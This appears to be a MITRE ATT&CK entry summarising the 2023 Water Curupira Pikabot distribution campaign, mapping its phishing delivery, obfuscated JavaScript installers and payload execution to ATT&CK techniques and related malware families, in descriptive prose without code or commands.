Water Curupira Pikabot Distribution

Pikabot was distributed in Water Curupira Pikabot Distribution throughout 2023 by an entity linked to BlackBasta ransomware deployment via email attachments. This activity followed the take-down of QakBot, with several technical overlaps and similarities with QakBot, indicating a possible connection. The identified activity led to the deployment of tools such as Cobalt Strike, while coinciding with campaigns delivering DarkGate and IcedID en route to ransomware deployment.[1]

ID: C0037
First Seen:  January 2023 [1]
Last Seen:  December 2023 [1]
Contributors: Inna Danilevich, U.S. Bank
Version: 1.0
Created: 17 July 2024
Last Modified: 28 October 2024

Techniques Used

Domain ID Name Use
Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

Water Curupira Pikabot Distribution installation via JavaScript will launch follow-on commands via cmd.exe.[1]

.007 Command and Scripting Interpreter: JavaScript

Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives.[1]

Enterprise T1140 Deobfuscate/Decode Files or Information

Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot.[1]

Enterprise T1589 .002 Gather Victim Identity Information: Email Addresses

Water Curupira Pikabot Distribution utilizes thread spoofing of existing email threads in order to execute spear phishing operations.[1]

Enterprise T1105 Ingress Tool Transfer

Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory.[1]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers.[1]

Enterprise T1218 .011 System Binary Proxy Execution: Rundll32

Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports Crash or Limit depending on the variant.[1]

Enterprise T1204 User Execution

Water Curupira Pikabot Distribution requires users to interact with malicious attachments in order to start Pikabot installation.[1]

.001 Malicious Link

Water Curupira Pikabot Distribution distributed a PDF attachment containing a malicious link to a Pikabot installer.[1]

.002 Malicious File

Water Curupira Pikabot Distribution delivered Pikabot installers as password-protected ZIP files containing heavily obfuscated JavaScript, or IMG files containing an LNK mimicking a Word document and a malicious DLL.[1]

Software

ID Name Description
S1111 DarkGate

Water Curupira Pikabot Distribution activity included distribution of DarkGate en route to ransomware execution.[1]

S0483 IcedID

Water Curupira Pikabot Distribution included distribution of IcedID en route to ransomware deployment.[1]

S1145 Pikabot

Water Curupira Pikabot Distribution distributed Pikabot as an initial access mechanism.[1]

References